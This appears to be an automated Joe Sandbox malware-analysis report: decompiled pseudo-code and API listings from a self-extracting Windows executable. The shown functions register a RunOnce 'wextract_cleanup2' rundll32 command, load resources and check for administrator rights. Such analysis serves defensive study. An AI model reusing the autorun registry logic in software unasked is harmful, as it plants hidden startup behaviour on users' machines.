                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.
                                                                                                                                                                                                                                            • API String ID: 3244514340-1556763079
                                                                                                                                                                                                                                            • Opcode ID: ea9ceda4261ec7d4d56bc8b88bcb2e7bef03217f8872b5618fac4c3a17f4a7ce
                                                                                                                                                                                                                                            • Instruction ID: b98619aa3fb895b70509fdeabf313a681244a6680a0bdbe5e15455759a6033c0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea9ceda4261ec7d4d56bc8b88bcb2e7bef03217f8872b5618fac4c3a17f4a7ce
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB510676A0131AABDB219E28CC48BBA7BB8EF45300F014194FD89E7649DB36D945CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                                            			E010D2267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0x10d8530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E010D658A( &_v268, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							E010D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_t47 = 0x10d91e4;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010D22A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 010D22D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D22F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D2305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010D236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 010D237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 3027380567-1330155338
                                                                                                                                                                                                                                            • Opcode ID: 0291c63ee397878c55fbbb439a087610a14775c93b008bec8ec168c67efe0be3
                                                                                                                                                                                                                                            • Instruction ID: c137d7a711cb86dc6ca05b9c074a56bfa38d99d32b4e2c0ec5b5ba32ee181130
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0291c63ee397878c55fbbb439a087610a14775c93b008bec8ec168c67efe0be3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2531D971A00318ABDB719B65DC48FEA7B7CEF54740F0041E9F98DAB004DA756B84CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE
                                                                                                                                                                                                                                            • API String ID: 3370778649-3697457883
                                                                                                                                                                                                                                            • Opcode ID: c40f13e36e2a3ec91f60b08379c6405ce1d73a988167c8742d1b48fb5f47b467
                                                                                                                                                                                                                                            • Instruction ID: 50e26eaa64510117a486db407930dfd80ccb46045f9786cd11c34179b86816c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c40f13e36e2a3ec91f60b08379c6405ce1d73a988167c8742d1b48fb5f47b467
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC016D36345310FBE3701AA96C4DF6B7E6CDB89BA2F044014FFCAD7184C9B6884587A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E010D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0x10d8590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0x10d8590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E010D43D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0x10d8d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, 0x10d9154);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0x10d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E010D30C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 010D313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 010D316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D3176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 010D317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 010D3185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 010D3190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,010D30C0), ref: 010D31A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010D31CA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3785188418-0
                                                                                                                                                                                                                                            • Opcode ID: f61249711ae0ca172162997c3f9c493125508eaae56054a3a4ab591920176c35
                                                                                                                                                                                                                                            • Instruction ID: e7c354eeecb0eac7bcecf55f03de144189e80e11bee0505d6b49e3669d2d2fb2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f61249711ae0ca172162997c3f9c493125508eaae56054a3a4ab591920176c35
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8111A279246322FBDB615B38AC0CB6A3AB4FB46760F004611FDD59A188DB7A9141C746
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E010D17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0x10da288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010D18DD), ref: 010D181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010D182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(010D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010D18DD), ref: 010D1855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,010D18DD), ref: 010D1883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,010D18DD), ref: 010D188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: 59e87de73d36ee5632968a36a5a67421e357c07ea05833e216dc49000e2459cc
                                                                                                                                                                                                                                            • Instruction ID: 6911a63cad9597fe5b53701bd0f8797e374e17b008e9d01c5ed974faa547f455
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59e87de73d36ee5632968a36a5a67421e357c07ea05833e216dc49000e2459cc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87116375F01309EBEB109FA5EC4AABEBFB8EF44701F100169FA45E7241DB7599008B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E010D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0x10d9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D1680(_t65, E010D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E010D65E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E010D1680(_t65, E010D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x010d2b64
                                                                                                                                                                                                                                            0x010d2b64
                                                                                                                                                                                                                                            0x010d2b7a
                                                                                                                                                                                                                                            0x010d2b7f
                                                                                                                                                                                                                                            0x010d2b81
                                                                                                                                                                                                                                            0x010d2b81
                                                                                                                                                                                                                                            0x010d2b84
                                                                                                                                                                                                                                            0x010d2b84
                                                                                                                                                                                                                                            0x010d2b86
                                                                                                                                                                                                                                            0x010d2b87
                                                                                                                                                                                                                                            0x010d2bbf
                                                                                                                                                                                                                                            0x010d2bc1
                                                                                                                                                                                                                                            0x010d2bc1
                                                                                                                                                                                                                                            0x010d2b26
                                                                                                                                                                                                                                            0x010d2bda
                                                                                                                                                                                                                                            0x010d2bda
                                                                                                                                                                                                                                            0x010d2be6
                                                                                                                                                                                                                                            0x010d2be6
                                                                                                                                                                                                                                            0x010d2bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010D2AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 010D2AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 010D2B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 010D2B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 010D2B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 010D2BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 58dc4d5e6137a29ac59ac4ff64c1cc32aa7059256d1ca200806aff194ac9d9f9
                                                                                                                                                                                                                                            • Instruction ID: 60d7d86120d8d08918df4a71e9fa53ba7b73dafe168394525f39c6f1d90ec185
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58dc4d5e6137a29ac59ac4ff64c1cc32aa7059256d1ca200806aff194ac9d9f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D4118346043469FDF669F388854AFD7FA99F46320F0440DAECC287202DF7A4A86CB60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E010D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
